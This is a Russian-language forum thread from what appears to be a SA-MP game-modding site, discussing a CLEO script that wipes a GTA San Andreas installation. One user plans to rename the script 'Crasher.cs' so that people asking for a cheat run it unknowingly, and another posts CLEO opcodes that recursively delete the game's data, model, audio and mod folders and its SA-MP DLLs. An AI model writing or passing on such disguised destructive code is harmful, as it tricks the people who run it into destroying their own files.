CLEO SA Deleter

Статус
В этой теме нельзя размещать новые ответы.

mac

HEY DARLING
1,317
907
Спасибо, а то никак не могу удалить ее... Руки не доходят, жалко хдд
 

Julia

Больше нет с нами
369
53
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
спс супер у меня как раз многие крашер просят переименую в Crasher.cs и пусть пользуются на здоровье :D
 
  • Нравится
Реакции: Walk228 и DarkP1xel

#Sh0w

Новичок
6
5
Чтоб прям ваще ничего не осталось немног доделал его

Код:
0B01: delete_directory "anim" with_all_files_and_subdirectories 1 // IF and SET 
0B01: delete_directory "audio" with_all_files_and_subdirectories 1 // IF and SET 
0B01: delete_directory "CLEO" with_all_files_and_subdirectories 1 // IF and SET 
0B01: delete_directory "data" with_all_files_and_subdirectories 1 // IF and SET 
0B01: delete_directory "models" with_all_files_and_subdirectories 1 // IF and SET 
0B01: delete_directory "movies" with_all_files_and_subdirectories 1 // IF and SET 
0B01: delete_directory "SAMPFUNCS" with_all_files_and_subdirectories 1 // IF and SET 
0B01: delete_directory "text" with_all_files_and_subdirectories 1 // IF and SET 
0B00: delete_file "d3d9.DLL" // IF and SET          
0B00: delete_file "SAMP.DLL" // IF and SET 
0B00: delete_file "SAMP.SAA" // IF and SET 
0B00: delete_file "SAMPUninstall.exe" // IF and SET
 

#Sh0w

Новичок
6
5
Ну и? Твой скрипт не будет работать у тех, у кого нет файлов, ибо будет выдавать ерроры. Если уж удалять читерские скрипты, то сначала надо проверить их наличие в папке -_-
Ну ок, делаем проще, убираем их в конец списка, если и будут ероры ничего страшного (могу ошибаться, в клео неоч шарю)
 

PoccoJI

Новичок
135
10
Ну и? Твой скрипт не будет работать у тех, у кого нет файлов, ибо будет выдавать ерроры. Если уж удалять читерские скрипты, то сначала надо проверить их наличие в папке -_-
ну и че блеть? если этих файлов нет ничего страшного не случится... думаю проверки хуерки уже есть в этом опкоде. Да и тебе какая разница все равно в самп не играешь
 
Статус
В этой теме нельзя размещать новые ответы.